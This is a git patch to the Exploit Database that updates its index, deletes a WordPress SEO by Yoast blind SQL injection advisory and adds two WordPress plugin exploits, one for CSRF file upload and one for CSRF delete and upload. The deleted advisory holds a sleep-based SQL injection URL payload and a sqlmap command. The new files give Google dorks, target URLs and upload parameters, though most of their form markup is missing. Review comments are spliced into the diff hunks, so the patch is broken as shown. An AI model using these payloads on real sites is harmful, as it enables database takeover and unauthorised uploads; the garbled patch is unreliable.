From f7fce69883ae06d4e851b124a8313c8bcea08dab Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Mon, 6 Apr 2015 08:36:30 +0000
Subject: [PATCH] DB: 2015-04-06 2 new exploits
---
 files.csv | 4 +-
 platforms/aix/dos/36413.txt | 74 ------------------------------
 platforms/php/webapps/36610.txt | 61 +++++++++++++++++++++++++
 platforms/php/webapps/36612.txt | 81 +++++++++++++++++++++++++++++++++
 4 files changed, 145 insertions(+), 75 deletions(-)
 delete mode 100755 platforms/aix/dos/36413.txt
 create mode 100755 platforms/php/webapps/36610.txt
 create mode 100755 platforms/php/webapps/36612.txt
diff --git a/files.csv b/files.csv
index 2b187216e..b235e4d10 100755
--- a/files.csv
+++ b/files.csv
@@ -32833,7 +32833,7 @@ id,file,description,date,author,platform,type,port
 36410,platforms/php/webapps/36410.txt,"Simple Machines Forum 1.1.15 ''fckeditor' Arbitrary File Upload Vulnerability",2011-12-06,HELLBOY,php,webapps,0
 36411,platforms/windows/shellcode/36411.txt,"Shellcode Win x86-64 - Download & execute (Generator)",2015-03-16,"Ali Razmjoo",windows,shellcode,0
 36412,platforms/windows/remote/36412.rb,"IPass Control Pipe Remote Command Execution",2015-03-16,metasploit,windows,remote,0
-36413,platforms/aix/dos/36413.txt,"WordPress SEO by Yoast 1.7.3.3 - Blind SQL Injection",2015-03-16,"Ryan Dewhurst",aix,dos,0
+36413,platforms/php/webapps/36413.txt,"WordPress SEO by Yoast 1.7.3.3 - Blind SQL Injection",2015-03-16,"Ryan Dewhurst",php,webapps,0
 36414,platforms/php/webapps/36414.txt,"WordPress WPML - Multiple Vulnerabilities",2015-03-16,"Jouko Pynnonen",php,webapps,80
 36415,platforms/java/remote/36415.rb,"ElasticSearch Search Groovy Sandbox Bypass",2015-03-16,metasploit,java,remote,9200
 36417,platforms/windows/local/36417.txt,"Spybot Search & Destroy 1.6.2 Security Center Service - Privilege Escalation",2015-03-17,LiquidWorm,windows,local,0
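Review bot: The `+36413` row now points at `platforms/php/webapps/36413.txt`, but this patch only deletes `platforms/aix/dos/36413.txt` (see the `delete mode` line in the diffstat) and creates 36610 and 36612, so unless a file already exists at the new path in the tree the index now references a path with nothing behind it. The reclassification itself looks right, since the advisory describes a WordPress plugin SQL injection rather than an AIX denial of service. The fix is to move the file in the same commit, i.e. rename `platforms/aix/dos/36413.txt` to `platforms/php/webapps/36413.txt` instead of deleting it, or to hold the row back until the file lands at the new path.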
@@ -33021,6 +33021,8 @@ id,file,description,date,author,platform,type,port
 36606,platforms/windows/remote/36606.html,"WebGate eDVR Manager 2.6.4 SiteChannel Property Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0
 36607,platforms/windows/remote/36607.html,"WebGate eDVR Manager 2.6.4 Connect Method Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0
 36609,platforms/multiple/webapps/36609.txt,"Kemp Load Master 7.1.16 - Multiple Vulnerabilities",2015-04-02,"Roberto Suggi Liverani",multiple,webapps,80
+36610,platforms/php/webapps/36610.txt,"Wordpress Video Gallery Plugin 2.8 - Multiple CSRF Vulnerabilities",2015-04-02,Divya,php,webapps,80
+36612,platforms/php/webapps/36612.txt,"Wordpress WP Easy Slideshow Plugin 1.0.3 - Multiple Vulnerabilities",2015-04-02,Divya,php,webapps,80
 36613,platforms/php/webapps/36613.txt,"Wordpress Simple Ads Manager Plugin - Multiple SQL Injection",2015-04-02,"ITAS Team",php,webapps,80
 36614,platforms/php/webapps/36614.txt,"Wordpress Simple Ads Manager 2.5.94 - Arbitrary File Upload",2015-04-02,"ITAS Team",php,webapps,80
 36615,platforms/php/webapps/36615.txt,"Wordpress Simple Ads Manager - Information Disclosure",2015-04-02,"ITAS Team",php,webapps,80
diff --git a/platforms/aix/dos/36413.txt b/platforms/aix/dos/36413.txt
deleted file mode 100755
index c694dbdf3..000000000
--- a/platforms/aix/dos/36413.txt
+++ /dev/null
@@ -1,74 +0,0 @@
-Title: WordPress SEO by Yoast <= 1.7.3.3 - Blind SQL Injection
-Version/s Tested: 1.7.3.3
-Patched Version: 1.7.4
-CVSSv2 Base Score: 9 (AV:N/AC:L/Au:S/C:C/I:C/A:C/E:POC/RL:OF/RC:C)
-CVSSv2 Temporal Score: 7 (AV:N/AC:L/Au:S/C:C/I:C/A:C/E:POC/RL:OF/RC:C)
-WPVULNDB: https://wpvulndb.com/vulnerabilities/7841
-
-Description:
-
-WordPress SEO by Yoast is a popular WordPress plugin (wordpress-seo) used
-to improve the Search Engine Optimization (SEO) of WordPress sites. The
-latest version at the time of writing (1.7.3.3) has been found to be
-affected by two authenticated (admin, editor or author user) Blind SQL
-Injection vulnerabilities. The plugin has more than one million downloads
-according to WordPress.
-
-Technical Description:
-
-The authenticated Blind SQL Injection vulnerability can be found within the
-'admin/class-bulk-editor-list-table.php' file. The orderby and order GET
-parameters are not sufficiently sanitised before being used within a SQL
-query.
-
-Line 529:
-
-$orderby = ! empty( $_GET['orderby'] ) ? esc_sql( sanitize_text_field(
-$_GET['orderby'] ) ) : 'post_title';
-
-Line 533:
-
-order = esc_sql( strtoupper( sanitize_text_field( $_GET['order'] ) ) );
-
-If the GET orderby parameter value is not empty it will pass its value
-through WordPess's own esc_sql() function. According to WordPress this
-function 'Prepares a string for use as an SQL query. A glorified
-addslashes() that works with arrays.'. However, this is not sufficient to
-prevent SQL Injection as can be seen from our Proof of Concept.
-
-Proof of Concept (PoC):
-
-The following GET request will cause the SQL query to execute and sleep for
-10 seconds if clicked on as an authenticated admin, editor or author user.
-
-http://127.0.0.1/wp-admin/admin.php?page=wpseo_bulk-editor&type=title&orderby=post_date%2c(select%20*%20from%20(select(sleep(10)))a)&order=asc
-
-Using SQLMap:
-
-python sqlmap.py -u "
-http://127.0.0.1/wp-admin/admin.php?page=wpseo_bulk-editor&type=title&orderby=post_date*&order=asc"
---batch --technique=B --dbms=MySQL --cookie="wordpress_9d...;
-wordpress_logged_in_9dee67...;"
-
-Impact:
-
-As there is no anti-CSRF protection a remote unauthenticated attacker could
-use this vulnerability to execute arbitrary SQL queries on the victim
-WordPress web site by enticing an authenticated admin, editor or author
-user to click on a specially crafted link or visit a page they control.
-
-One possible attack scenario would be an attacker adding their own
-administrative user to the target WordPress site, allowing them to
-compromise the entire web site.
-
-Timeline:
-
-March 10th 2015 - 15:30 GMT: Vulnerability discovered by Ryan Dewhurst
-(WPScan Team - Dewhurst Security).
-March 10th 2015 - 18:30 GMT: Technical review by FireFart (WPScan Team).
-March 10th 2015 - 20:00 GMT: Vendor contacted via email.
-March 10th 2015 - 21:25 GMT: Vendor replies, confirms issue and gave
-expected patch timeline.
-March 11th 2015 - 12:05 GMT: Vendor released version 1.7.4 which patches
-this issue.
-March 11th 2015 - 12:30 GMT: Advisory released.
\ No newline at end of file
diff --git a/platforms/php/webapps/36610.txt b/platforms/php/webapps/36610.txt
new file mode 100755
index 000000000..7ae0ca242
--- /dev/null
+++ b/platforms/php/webapps/36610.txt
@@ -0,0 +1,61 @@ +# Exploit Title: Wordpress Video Gallery Plugin Multiple CSRF File Upload +# Google Dork: inurl:/wp-content/plugins/contus-video-gallery +# Date: 31 March 2015 +# Exploit Author: Divya +# Vendor Homepage: https://wordpress.org/plugins/contus-video-gallery/ +# Software Link: https://downloads.wordpress.org/plugin/contus-video-gallery.2.8.zip +# Version: 2.8 +# Tested on: Windows, Linux +# CVE : None + +CSRF File Upload Exploit Code: + + + + +WP Plugin CSRF File Upload + + + +
+ +
+ + + + + + +Other CSRF vulnerable areas of application: +URL: http://192.168.1.2/wp-admin/admin-ajax.php?action=uploadvideo +Data: myfile=[upload_file_details]&mode=video + +URL: http://192.168.1.2/wp-admin/admin-ajax.php?action=uploadvideo +Data: myfile=[upload_file_details]&mode=image + +URL: http://192.168.1.2/wp-admin/admin-ajax.php?action=uploadvideo +Data: myfile=[upload_file_details]&mode=srt \ No newline at end of file diff --git a/platforms/php/webapps/36612.txt b/platforms/php/webapps/36612.txt new file mode 100755 index 000000000..04844db88 --- /dev/null +++ b/platforms/php/webapps/36612.txt @@ -0,0 +1,81 @@ +# Exploit Title: Wordpress WP Easy Slideshow Plugin Multiple Vulnerabilities +# Google Dork: inurl:/wp-content/uploads/wp-easy-slideshow/ +# Date: 2 April 2015 +# Exploit Author: Divya +# Vendor Homepage: https://wordpress.org/plugins/wp-easy-slideshow/ +# Software Link: https://downloads.wordpress.org/plugin/wp-easy-slideshow.zip +# Version: 1.0.3 +# Tested on: Windows, Linux +# CVE : None + +Delete operation using CSRF: + + +Example: http://192.168.1.2/wp-admin/admin.php?page=wss-images&del_id=1 + + + CSRF Delete Operation + +
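Review bot: The header block of 36610.txt stops at `# CVE : None` and gives no indication of whether a fixed plugin version exists, so a reader cannot tell from the file whether 2.8 is still the latest release or what to upgrade to; the same gap is in 36612.txt in the next hunk. The advisory this commit removes (36413.txt) carried a `Patched Version:` line and a vendor-contact timeline, which is the information a defender actually needs. Suggest adding a `# Patched Version: <unknown at time of submission>` line after the `# Version:` line in both headers, and filling it in if the vendor was contacted. Minor: the `# Exploit Title:` here reads "Multiple CSRF File Upload" while the files.csv row for 36610 calls it "Multiple CSRF Vulnerabilities"; one wording should be used in both places.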
+ + + +
+ + + + +Arbitrary File Upload using CSRF: + + + WP CSRF File Upload + + +
+ +
+ + + + +Arbitrary File Upload (Authenticated): + +URL: http://192.168.1.2/wp-admin/admin.php?page=wss-add-image + +The upload script allows uploading arbitrary files. The files are renamed to numbers like 1,2,3,... The uploaded files cannot be executed on server. + +Upload Location: http://192.168.1.2/wp-content/uploads/wp-easy-slideshow/